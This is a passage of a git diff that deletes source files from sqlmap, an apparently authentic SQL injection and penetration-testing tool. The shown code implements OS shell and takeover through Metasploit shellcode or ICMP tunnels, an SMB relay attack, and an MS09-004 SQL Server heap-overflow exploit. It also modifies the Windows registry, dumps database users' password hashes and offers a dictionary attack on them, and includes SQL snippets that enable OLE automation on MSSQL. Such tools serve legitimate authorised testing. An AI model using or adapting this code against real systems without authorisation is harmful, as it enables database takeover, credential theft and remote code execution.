- web = False - elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL): - infoMsg = "going to use a web backdoor for command execution" - logger.info(infoMsg) - - web = True - else: - errMsg = "unable to execute operating system commands via " - errMsg += "the back-end DBMS" - raise SqlmapNotVulnerableException(errMsg) - - self.getRemoteTempPath() - self.initEnv(web=web) - - if not web or (web and self.webBackdoorUrl is not None): - self.runCmd(conf.osCmd) - - if not conf.osShell and not conf.osPwn and not conf.cleanup: - self.cleanup(web=web) - - def osShell(self): - if isStackingAvailable() or conf.direct: - web = False - elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL): - infoMsg = "going to use a web backdoor for command prompt" - logger.info(infoMsg) - - web = True - else: - errMsg = "unable to prompt for an interactive operating " - errMsg += "system shell via the back-end DBMS because " - errMsg += "stacked queries SQL injection is not supported" - raise SqlmapNotVulnerableException(errMsg) - - self.getRemoteTempPath() - self.initEnv(web=web) - - if not web or (web and self.webBackdoorUrl is not None): - self.shell() - - if not conf.osPwn and not conf.cleanup: - self.cleanup(web=web) - - def osPwn(self): - goUdf = False - fallbackToWeb = False - setupSuccess = False - - self.checkDbmsOs() - - if Backend.isOs(OS.WINDOWS): - msg = "how do you want to establish the tunnel?" - msg += "\n[1] TCP: Metasploit Framework (default)" - msg += "\n[2] ICMP: icmpsh - ICMP tunneling" - valids = (1, 2) - - while True: - tunnel = readInput(msg, default=1) - - if isinstance(tunnel, basestring) and tunnel.isdigit() and int(tunnel) in valids: - tunnel = int(tunnel) - break - - elif isinstance(tunnel, int) and tunnel in valids: - break - - else: - warnMsg = "invalid value, valid values are 1 and 2" - logger.warn(warnMsg) - else: - tunnel = 1 - - debugMsg = "the tunnel can be established only via TCP when " - debugMsg += "the back-end DBMS is not Windows" - logger.debug(debugMsg) - - if tunnel == 2: - isAdmin = runningAsAdmin() - - if not isAdmin: - errMsg = "you need to run sqlmap as an administrator " - errMsg += "if you want to establish an out-of-band ICMP " - errMsg += "tunnel because icmpsh uses raw sockets to " - errMsg += "sniff and craft ICMP packets" - raise SqlmapMissingPrivileges(errMsg) - - try: - from impacket import ImpactDecoder - from impacket import ImpactPacket - except ImportError: - errMsg = "sqlmap requires 'python-impacket' third-party library " - errMsg += "in order to run icmpsh master. You can get it at " - errMsg += "http://code.google.com/p/impacket/downloads/list" - raise SqlmapMissingDependence(errMsg) - - sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all" - - if os.path.exists(sysIgnoreIcmp): - fp = open(sysIgnoreIcmp, "wb") - fp.write("1") - fp.close() - else: - errMsg = "you need to disable ICMP replies by your machine " - errMsg += "system-wide. For example run on Linux/Unix:\n" - errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n" - errMsg += "If you miss doing that, you will receive " - errMsg += "information from the database server and it " - errMsg += "is unlikely to receive commands sent from you" - logger.error(errMsg) - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - self.sysUdfs.pop("sys_bineval") - - self.getRemoteTempPath() - - if isStackingAvailable() or conf.direct: - web = False - - self.initEnv(web=web) - - if tunnel == 1: - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - msg = "how do you want to execute the Metasploit shellcode " - msg += "on the back-end database underlying operating system?" - msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)" - msg += "\n[2] Via shellcodeexec (file system way, preferred on 64-bit systems)" - - while True: - choice = readInput(msg, default=1) - - if isinstance(choice, basestring) and choice.isdigit() and int(choice) in (1, 2): - choice = int(choice) - break - - elif isinstance(choice, int) and choice in (1, 2): - break - - else: - warnMsg = "invalid value, valid values are 1 and 2" - logger.warn(warnMsg) - - if choice == 1: - goUdf = True - - if goUdf: - exitfunc = "thread" - setupSuccess = True - else: - exitfunc = "process" - - self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") - - if not goUdf: - setupSuccess = self.uploadShellcodeexec(web=web) - - if setupSuccess is not True: - if Backend.isDbms(DBMS.MYSQL): - fallbackToWeb = True - else: - msg = "unable to mount the operating system takeover" - raise SqlmapFilePathException(msg) - - if Backend.isOs(OS.WINDOWS) and Backend.isDbms(DBMS.MYSQL) and conf.privEsc: - debugMsg = "by default MySQL on Windows runs as SYSTEM " - debugMsg += "user, no need to privilege escalate" - logger.debug(debugMsg) - - elif tunnel == 2: - setupSuccess = self.uploadIcmpshSlave(web=web) - - if setupSuccess is not True: - if Backend.isDbms(DBMS.MYSQL): - fallbackToWeb = True - else: - msg = "unable to mount the operating system takeover" - raise SqlmapFilePathException(msg) - - if not setupSuccess and Backend.isDbms(DBMS.MYSQL) and not conf.direct and (not isStackingAvailable() or fallbackToWeb): - web = True - - if fallbackToWeb: - infoMsg = "falling back to web backdoor to establish the tunnel" - else: - infoMsg = "going to use a web backdoor to establish the tunnel" - logger.info(infoMsg) - - self.initEnv(web=web, forceInit=fallbackToWeb) - - if self.webBackdoorUrl: - if not Backend.isOs(OS.WINDOWS) and conf.privEsc: - # Unset --priv-esc if the back-end DBMS underlying operating - # system is not Windows - conf.privEsc = False - - warnMsg = "sqlmap does not implement any operating system " - warnMsg += "user privilege escalation technique when the " - warnMsg += "back-end DBMS underlying system is not Windows" - logger.warn(warnMsg) - - if tunnel == 1: - self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") - setupSuccess = self.uploadShellcodeexec(web=web) - - if setupSuccess is not True: - msg = "unable to mount the operating system takeover" - raise SqlmapFilePathException(msg) - - elif tunnel == 2: - setupSuccess = self.uploadIcmpshSlave(web=web) - - if setupSuccess is not True: - msg = "unable to mount the operating system takeover" - raise SqlmapFilePathException(msg) - - if setupSuccess: - if tunnel == 1: - self.pwn(goUdf) - elif tunnel == 2: - self.icmpPwn() - else: - errMsg = "unable to prompt for an out-of-band session" - raise SqlmapNotVulnerableException(errMsg) - - if not conf.cleanup: - self.cleanup(web=web) - - def osSmb(self): - self.checkDbmsOs() - - if not Backend.isOs(OS.WINDOWS): - errMsg = "the back-end DBMS underlying operating system is " - errMsg += "not Windows: it is not possible to perform the SMB " - errMsg += "relay attack" - raise SqlmapUnsupportedDBMSException(errMsg) - - if not isStackingAvailable() and not conf.direct: - if Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.MSSQL): - errMsg = "on this back-end DBMS it is only possible to " - errMsg += "perform the SMB relay attack if stacked " - errMsg += "queries are supported" - raise SqlmapUnsupportedDBMSException(errMsg) - - elif Backend.isDbms(DBMS.MYSQL): - debugMsg = "since stacked queries are not supported, " - debugMsg += "sqlmap is going to perform the SMB relay " - debugMsg += "attack via inference blind SQL injection" - logger.debug(debugMsg) - - printWarn = True - warnMsg = "it is unlikely that this attack will be successful " - - if Backend.isDbms(DBMS.MYSQL): - warnMsg += "because by default MySQL on Windows runs as " - warnMsg += "Local System which is not a real user, it does " - warnMsg += "not send the NTLM session hash when connecting to " - warnMsg += "a SMB service" - - elif Backend.isDbms(DBMS.PGSQL): - warnMsg += "because by default PostgreSQL on Windows runs " - warnMsg += "as postgres user which is a real user of the " - warnMsg += "system, but not within the Administrators group" - - elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): - warnMsg += "because often Microsoft SQL Server %s " % Backend.getVersion() - warnMsg += "runs as Network Service which is not a real user, " - warnMsg += "it does not send the NTLM session hash when " - warnMsg += "connecting to a SMB service" - - else: - printWarn = False - - if printWarn: - logger.warn(warnMsg) - - self.smb() - - def osBof(self): - if not isStackingAvailable() and not conf.direct: - return - - if not Backend.isDbms(DBMS.MSSQL) or not Backend.isVersionWithin(("2000", "2005")): - errMsg = "the back-end DBMS must be Microsoft SQL Server " - errMsg += "2000 or 2005 to be able to exploit the heap-based " - errMsg += "buffer overflow in the 'sp_replwritetovarbin' " - errMsg += "stored procedure (MS09-004)" - raise SqlmapUnsupportedDBMSException(errMsg) - - infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion() - infoMsg += "'sp_replwritetovarbin' stored procedure heap-based " - infoMsg += "buffer overflow (MS09-004)" - logger.info(infoMsg) - - msg = "this technique is likely to DoS the DBMS process, are you " - msg += "sure that you want to carry with the exploit? [y/N] " - choice = readInput(msg, default="N") - - dos = choice and choice[0].lower() == "y" - - if dos: - self.initEnv(mandatory=False, detailed=True) - self.getRemoteTempPath() - self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True) - self.bof() - - def uncPathRequest(self): - errMsg = "'uncPathRequest' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def _regInit(self): - if not isStackingAvailable() and not conf.direct: - return - - self.checkDbmsOs() - - if not Backend.isOs(OS.WINDOWS): - errMsg = "the back-end DBMS underlying operating system is " - errMsg += "not Windows" - raise SqlmapUnsupportedDBMSException(errMsg) - - self.initEnv() - self.getRemoteTempPath() - - def regRead(self): - self._regInit() - - if not conf.regKey: - default = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" - msg = "which registry key do you want to read? [%s] " % default - regKey = readInput(msg, default=default) - else: - regKey = conf.regKey - - if not conf.regVal: - default = "ProductName" - msg = "which registry key value do you want to read? [%s] " % default - regVal = readInput(msg, default=default) - else: - regVal = conf.regVal - - infoMsg = "reading Windows registry path '%s\%s' " % (regKey, regVal) - logger.info(infoMsg) - - return self.readRegKey(regKey, regVal, True) - - def regAdd(self): - self._regInit() - - errMsg = "missing mandatory option" - - if not conf.regKey: - msg = "which registry key do you want to write? " - regKey = readInput(msg) - - if not regKey: - raise SqlmapMissingMandatoryOptionException(errMsg) - else: - regKey = conf.regKey - - if not conf.regVal: - msg = "which registry key value do you want to write? " - regVal = readInput(msg) - - if not regVal: - raise SqlmapMissingMandatoryOptionException(errMsg) - else: - regVal = conf.regVal - - if not conf.regData: - msg = "which registry key value data do you want to write? " - regData = readInput(msg) - - if not regData: - raise SqlmapMissingMandatoryOptionException(errMsg) - else: - regData = conf.regData - - if not conf.regType: - default = "REG_SZ" - msg = "which registry key value data-type is it? " - msg += "[%s] " % default - regType = readInput(msg, default=default) - else: - regType = conf.regType - - infoMsg = "adding Windows registry path '%s\%s' " % (regKey, regVal) - infoMsg += "with data '%s'. " % regData - infoMsg += "This will work only if the user running the database " - infoMsg += "process has privileges to modify the Windows registry." - logger.info(infoMsg) - - self.addRegKey(regKey, regVal, regType, regData) - - def regDel(self): - self._regInit() - - errMsg = "missing mandatory option" - - if not conf.regKey: - msg = "which registry key do you want to delete? " - regKey = readInput(msg) - - if not regKey: - raise SqlmapMissingMandatoryOptionException(errMsg) - else: - regKey = conf.regKey - - if not conf.regVal: - msg = "which registry key value do you want to delete? " - regVal = readInput(msg) - - if not regVal: - raise SqlmapMissingMandatoryOptionException(errMsg) - else: - regVal = conf.regVal - - message = "are you sure that you want to delete the Windows " - message += "registry path '%s\%s? [y/N] " % (regKey, regVal) - output = readInput(message, default="N") - - if output and output[0] not in ("Y", "y"): - return - - infoMsg = "deleting Windows registry path '%s\%s'. " % (regKey, regVal) - infoMsg += "This will work only if the user running the database " - infoMsg += "process has privileges to modify the Windows registry." - logger.info(infoMsg) - - self.delRegKey(regKey, regVal) diff --git a/plugins/generic/users.py b/plugins/generic/users.py deleted file mode 100644 index bb2db4cd..00000000 --- a/plugins/generic/users.py +++ /dev/null @@ -1,614 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.agent import agent -from lib.core.common import arrayizeValue -from lib.core.common import Backend -from lib.core.common import filterPairValues -from lib.core.common import getLimitRange -from lib.core.common import getUnicode -from lib.core.common import isAdminFromPrivileges -from lib.core.common import isInferenceAvailable -from lib.core.common import isNoneValue -from lib.core.common import isNumPosStrValue -from lib.core.common import isTechniqueAvailable -from lib.core.common import parsePasswordHash -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.common import unArrayizeValue -from lib.core.convert import hexencode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.dicts import MYSQL_PRIVS -from lib.core.dicts import PGSQL_PRIVS -from lib.core.dicts import FIREBIRD_PRIVS -from lib.core.dicts import DB2_PRIVS -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import DBMS -from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapNoneDataException -from lib.core.exception import SqlmapUserQuitException -from lib.core.threads import getCurrentThreadData -from lib.request import inject -from lib.utils.hash import attackCachedUsersPasswords -from lib.utils.hash import storeHashesToFile -from lib.utils.pivotdumptable import pivotDumpTable - -class Users: - """ - This class defines users' enumeration functionalities for plugins. - """ - - def __init__(self): - kb.data.currentUser = "" - kb.data.isDba = None - kb.data.cachedUsers = [] - kb.data.cachedUsersPasswords = {} - kb.data.cachedUsersPrivileges = {} - kb.data.cachedUsersRoles = {} - - def getCurrentUser(self): - infoMsg = "fetching current user" - logger.info(infoMsg) - - query = queries[Backend.getIdentifiedDbms()].current_user.query - - if not kb.data.currentUser: - kb.data.currentUser = unArrayizeValue(inject.getValue(query)) - - return kb.data.currentUser - - def isDba(self, user=None): - infoMsg = "testing if current user is DBA" - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MYSQL): - self.getCurrentUser() - query = queries[Backend.getIdentifiedDbms()].is_dba.query % (kb.data.currentUser.split("@")[0] if kb.data.currentUser else None) - elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and user is not None: - query = queries[Backend.getIdentifiedDbms()].is_dba.query2 % user - else: - query = queries[Backend.getIdentifiedDbms()].is_dba.query - - query = agent.forgeCaseStatement(query) - kb.data.isDba = inject.checkBooleanExpression(query) or False - - return kb.data.isDba - - def getUsers(self): - infoMsg = "fetching database users" - logger.info(infoMsg) - - rootQuery = queries[Backend.getIdentifiedDbms()].users - - condition = (Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008"))) - condition |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema) - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - if condition: - query = rootQuery.inband.query2 - else: - query = rootQuery.inband.query - values = inject.getValue(query, blind=False, time=False) - - if not isNoneValue(values): - kb.data.cachedUsers = [] - for value in arrayizeValue(values): - value = unArrayizeValue(value) - if not isNoneValue(value): - kb.data.cachedUsers.append(value) - - if not kb.data.cachedUsers and isInferenceAvailable() and not conf.direct: - infoMsg = "fetching number of database users" - logger.info(infoMsg) - - if condition: - query = rootQuery.blind.count2 - else: - query = rootQuery.blind.count - - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if count == 0: - return kb.data.cachedUsers - elif not isNumPosStrValue(count): - errMsg = "unable to retrieve the number of database users" - raise SqlmapNoneDataException(errMsg) - - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, plusOne=plusOne) - - for index in indexRange: - if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB): - query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ") - elif condition: - query = rootQuery.blind.query2 % index - else: - query = rootQuery.blind.query % index - user = unArrayizeValue(inject.getValue(query, union=False, error=False)) - - if user: - kb.data.cachedUsers.append(user) - - if not kb.data.cachedUsers: - errMsg = "unable to retrieve the database users" - logger.error(errMsg) - - return kb.data.cachedUsers - - def getPasswordHashes(self): - infoMsg = "fetching database users password hashes" - - rootQuery = queries[Backend.getIdentifiedDbms()].passwords - - if conf.user == "CU": - infoMsg += " for current user" - conf.user = self.getCurrentUser() - - logger.info(infoMsg) - - if conf.user and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - conf.user = conf.user.upper() - - if conf.user: - users = conf.user.split(",") - - if Backend.isDbms(DBMS.MYSQL): - for user in users: - parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) - - if parsedUser: - users[users.index(user)] = parsedUser.groups()[0] - else: - users = [] - - users = filter(None, users) - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): - query = rootQuery.inband.query2 - else: - query = rootQuery.inband.query - - condition = rootQuery.inband.condition - - if conf.user: - query += " WHERE " - query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) - - if Backend.isDbms(DBMS.SYBASE): - randStr = randomStr() - getCurrentThreadData().disableStdOut = True - - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=False) - - if retVal: - for user, password in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): - if user not in kb.data.cachedUsersPasswords: - kb.data.cachedUsersPasswords[user] = [password] - else: - kb.data.cachedUsersPasswords[user].append(password) - - getCurrentThreadData().disableStdOut = False - else: - values = inject.getValue(query, blind=False, time=False) - - for user, password in filterPairValues(values): - if not user or user == " ": - continue - - password = parsePasswordHash(password) - - if user not in kb.data.cachedUsersPasswords: - kb.data.cachedUsersPasswords[user] = [password] - else: - kb.data.cachedUsersPasswords[user].append(password) - - if not kb.data.cachedUsersPasswords and isInferenceAvailable() and not conf.direct: - if not len(users): - users = self.getUsers() - - if Backend.isDbms(DBMS.MYSQL): - for user in users: - parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) - - if parsedUser: - users[users.index(user)] = parsedUser.groups()[0] - - if Backend.isDbms(DBMS.SYBASE): - getCurrentThreadData().disableStdOut = True - - randStr = randomStr() - query = rootQuery.inband.query - - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=True) - - if retVal: - for user, password in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): - password = "0x%s" % hexencode(password).upper() - - if user not in kb.data.cachedUsersPasswords: - kb.data.cachedUsersPasswords[user] = [password] - else: - kb.data.cachedUsersPasswords[user].append(password) - - getCurrentThreadData().disableStdOut = False - else: - retrievedUsers = set() - - for user in users: - user = unArrayizeValue(user) - - if user in retrievedUsers: - continue - - infoMsg = "fetching number of password hashes " - infoMsg += "for user '%s'" % user - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): - query = rootQuery.blind.count2 % user - else: - query = rootQuery.blind.count % user - - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - warnMsg = "unable to retrieve the number of password " - warnMsg += "hashes for user '%s'" % user - logger.warn(warnMsg) - continue - - infoMsg = "fetching password hashes for user '%s'" % user - logger.info(infoMsg) - - passwords = [] - - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, plusOne=plusOne) - - for index in indexRange: - if Backend.isDbms(DBMS.MSSQL): - if Backend.isVersionWithin(("2005", "2008")): - query = rootQuery.blind.query2 % (user, index, user) - else: - query = rootQuery.blind.query % (user, index, user) - else: - query = rootQuery.blind.query % (user, index) - - password = unArrayizeValue(inject.getValue(query, union=False, error=False)) - password = parsePasswordHash(password) - passwords.append(password) - - if passwords: - kb.data.cachedUsersPasswords[user] = passwords - else: - warnMsg = "unable to retrieve the password " - warnMsg += "hashes for user '%s'" % user - logger.warn(warnMsg) - - retrievedUsers.add(user) - - if not kb.data.cachedUsersPasswords: - errMsg = "unable to retrieve the password hashes for the " - errMsg += "database users (probably because the session " - errMsg += "user has no read privileges over the relevant " - errMsg += "system database table)" - logger.error(errMsg) - else: - for user in kb.data.cachedUsersPasswords: - kb.data.cachedUsersPasswords[user] = list(set(kb.data.cachedUsersPasswords[user])) - - storeHashesToFile(kb.data.cachedUsersPasswords) - - message = "do you want to perform a dictionary-based attack " - message += "against retrieved password hashes? [Y/n/q]" - test = readInput(message, default="Y") - - if test[0] in ("n", "N"): - pass - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - attackCachedUsersPasswords() - - return kb.data.cachedUsersPasswords - - def getPrivileges(self, query2=False): - infoMsg = "fetching database users privileges" - - rootQuery = queries[Backend.getIdentifiedDbms()].privileges - - if conf.user == "CU": - infoMsg += " for current user" - conf.user = self.getCurrentUser() - - logger.info(infoMsg) - - if conf.user and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - conf.user = conf.user.upper() - - if conf.user: - users = conf.user.split(",") - - if Backend.isDbms(DBMS.MYSQL): - for user in users: - parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) - - if parsedUser: - users[users.index(user)] = parsedUser.groups()[0] - else: - users = [] - - users = filter(None, users) - - # Set containing the list of DBMS administrators - areAdmins = set() - - if not kb.data.cachedUsersPrivileges and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.inband.query2 - condition = rootQuery.inband.condition2 - elif Backend.isDbms(DBMS.ORACLE) and query2: - query = rootQuery.inband.query2 - condition = rootQuery.inband.condition2 - else: - query = rootQuery.inband.query - condition = rootQuery.inband.condition - - if conf.user: - query += " WHERE " - - if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: - query += " OR ".join("%s LIKE '%%%s%%'" % (condition, user) for user in sorted(users)) - else: - query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) - - values = inject.getValue(query, blind=False, time=False) - - if not values and Backend.isDbms(DBMS.ORACLE) and not query2: - infoMsg = "trying with table USER_SYS_PRIVS" - logger.info(infoMsg) - - return self.getPrivileges(query2=True) - - if not isNoneValue(values): - for value in values: - user = None - privileges = set() - - for count in xrange(0, len(value)): - # The first column is always the username - if count == 0: - user = value[count] - - # The other columns are the privileges - else: - privilege = value[count] - - if privilege is None: - continue - - # In PostgreSQL we get 1 if the privilege is - # True, 0 otherwise - if Backend.isDbms(DBMS.PGSQL) and getUnicode(privilege).isdigit(): - if int(privilege) == 1: - privileges.add(PGSQL_PRIVS[count]) - - # In MySQL >= 5.0 and Oracle we get the list - # of privileges as string - elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema): - privileges.add(privilege) - - # In MySQL < 5.0 we get Y if the privilege is - # True, N otherwise - elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - if privilege.upper() == "Y": - privileges.add(MYSQL_PRIVS[count]) - - # In Firebird we get one letter for each privilege - elif Backend.isDbms(DBMS.FIREBIRD): - privileges.add(FIREBIRD_PRIVS[privilege.strip()]) - - # In DB2 we get Y or G if the privilege is - # True, N otherwise - elif Backend.isDbms(DBMS.DB2): - privs = privilege.split(",") - privilege = privs[0] - if len(privs) > 1: - privs = privs[1] - privs = list(privs.strip()) - i = 1 - - for priv in privs: - if priv.upper() in ("Y", "G"): - for position, db2Priv in DB2_PRIVS.items(): - if position == i: - privilege += ", " + db2Priv - - i += 1 - - privileges.add(privilege) - - if user in kb.data.cachedUsersPrivileges: - kb.data.cachedUsersPrivileges[user] = list(privileges.union(kb.data.cachedUsersPrivileges[user])) - else: - kb.data.cachedUsersPrivileges[user] = list(privileges) - - if not kb.data.cachedUsersPrivileges and isInferenceAvailable() and not conf.direct: - if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: - conditionChar = "LIKE" - else: - conditionChar = "=" - - if not len(users): - users = self.getUsers() - - if Backend.isDbms(DBMS.MYSQL): - for user in users: - parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) - - if parsedUser: - users[users.index(user)] = parsedUser.groups()[0] - - retrievedUsers = set() - - for user in users: - outuser = user - if user in retrievedUsers: - continue - - if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: - user = "%%%s%%" % user - - infoMsg = "fetching number of privileges " - infoMsg += "for user '%s'" % outuser - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.blind.count2 % user - elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: - query = rootQuery.blind.count % (conditionChar, user) - elif Backend.isDbms(DBMS.ORACLE) and query2: - query = rootQuery.blind.count2 % user - else: - query = rootQuery.blind.count % user - - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2: - infoMsg = "trying with table USER_SYS_PRIVS" - logger.info(infoMsg) - - return self.getPrivileges(query2=True) - - warnMsg = "unable to retrieve the number of " - warnMsg += "privileges for user '%s'" % outuser - logger.warn(warnMsg) - continue - - infoMsg = "fetching privileges for user '%s'" % outuser - logger.info(infoMsg) - - privileges = set() - - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, plusOne=plusOne) - - for index in indexRange: - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.blind.query2 % (user, index) - elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: - query = rootQuery.blind.query % (conditionChar, user, index) - elif Backend.isDbms(DBMS.ORACLE) and query2: - query = rootQuery.blind.query2 % (user, index) - elif Backend.isDbms(DBMS.FIREBIRD): - query = rootQuery.blind.query % (index, user) - else: - query = rootQuery.blind.query % (user, index) - - privilege = unArrayizeValue(inject.getValue(query, union=False, error=False)) - - if privilege is None: - continue - - # In PostgreSQL we get 1 if the privilege is True, - # 0 otherwise - if Backend.isDbms(DBMS.PGSQL) and ", " in privilege: - privilege = privilege.replace(", ", ",") - privs = privilege.split(",") - i = 1 - - for priv in privs: - if priv.isdigit() and int(priv) == 1: - for position, pgsqlPriv in PGSQL_PRIVS.items(): - if position == i: - privileges.add(pgsqlPriv) - - i += 1 - - # In MySQL >= 5.0 and Oracle we get the list - # of privileges as string - elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema): - privileges.add(privilege) - - # In MySQL < 5.0 we get Y if the privilege is - # True, N otherwise - elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - privilege = privilege.replace(", ", ",") - privs = privilege.split(",") - i = 1 - - for priv in privs: - if priv.upper() == "Y": - for position, mysqlPriv in MYSQL_PRIVS.items(): - if position == i: - privileges.add(mysqlPriv) - - i += 1 - - # In Firebird we get one letter for each privilege - elif Backend.isDbms(DBMS.FIREBIRD): - privileges.add(FIREBIRD_PRIVS[privilege.strip()]) - - # In DB2 we get Y or G if the privilege is - # True, N otherwise - elif Backend.isDbms(DBMS.DB2): - privs = privilege.split(",") - privilege = privs[0] - privs = privs[1] - privs = list(privs.strip()) - i = 1 - - for priv in privs: - if priv.upper() in ("Y", "G"): - for position, db2Priv in DB2_PRIVS.items(): - if position == i: - privilege += ", " + db2Priv - - i += 1 - - privileges.add(privilege) - - # In MySQL < 5.0 we break the cycle after the first - # time we get the user's privileges otherwise we - # duplicate the same query - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - break - - if privileges: - kb.data.cachedUsersPrivileges[user] = list(privileges) - else: - warnMsg = "unable to retrieve the privileges " - warnMsg += "for user '%s'" % outuser - logger.warn(warnMsg) - - retrievedUsers.add(user) - - if not kb.data.cachedUsersPrivileges: - errMsg = "unable to retrieve the privileges " - errMsg += "for the database users" - raise SqlmapNoneDataException(errMsg) - - for user, privileges in kb.data.cachedUsersPrivileges.items(): - if isAdminFromPrivileges(privileges): - areAdmins.add(user) - - return (kb.data.cachedUsersPrivileges, areAdmins) - - def getRoles(self, query2=False): - warnMsg = "on %s the concept of roles does not " % Backend.getIdentifiedDbms() - warnMsg += "exist. sqlmap will enumerate privileges instead" - logger.warn(warnMsg) - - return self.getPrivileges(query2) diff --git a/procs/README.txt b/procs/README.txt deleted file mode 100644 index c693f063..00000000 --- a/procs/README.txt +++ /dev/null @@ -1,4 +0,0 @@ -Files in this folder represent SQL snippets used by sqlmap on the target -system. -They are licensed under the terms of the GNU Lesser General Public License -where not specified otherwise. diff --git a/procs/mssqlserver/activate_sp_oacreate.sql b/procs/mssqlserver/activate_sp_oacreate.sql deleted file mode 100644 index 753efb71..00000000 --- a/procs/mssqlserver/activate_sp_oacreate.sql +++ /dev/null @@ -1,4 +0,0 @@ -EXEC master..sp_configure 'show advanced options',1; -RECONFIGURE WITH OVERRIDE; -EXEC master..sp_configure 'ole automation procedures',1; -RECONFIGURE WITH OVERRIDE diff --git a/procs/mssqlserver/configure_openrowset.sql b/procs/mssqlserver/configure_openrowset.sql deleted file mode 100644 index 5f3d6d82..00000000 --- a/procs/mssqlserver/configure_openrowset.sql +++ /dev/null @@ -1,6 +0,0 @@ -EXEC master..sp_configure 'show advanced options', 1; -RECONFIGURE WITH OVERRIDE; -EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%; -RECONFIGURE WITH OVERRIDE; -EXEC sp_configure 'show advanced options', 0; -RECONFIGURE WITH OVERRIDE diff --git a/procs/mssqlserver/configure_xp_cmdshell.sql b/procs/mssqlserver/configure_xp_cmdshell.sql deleted file mode 100644 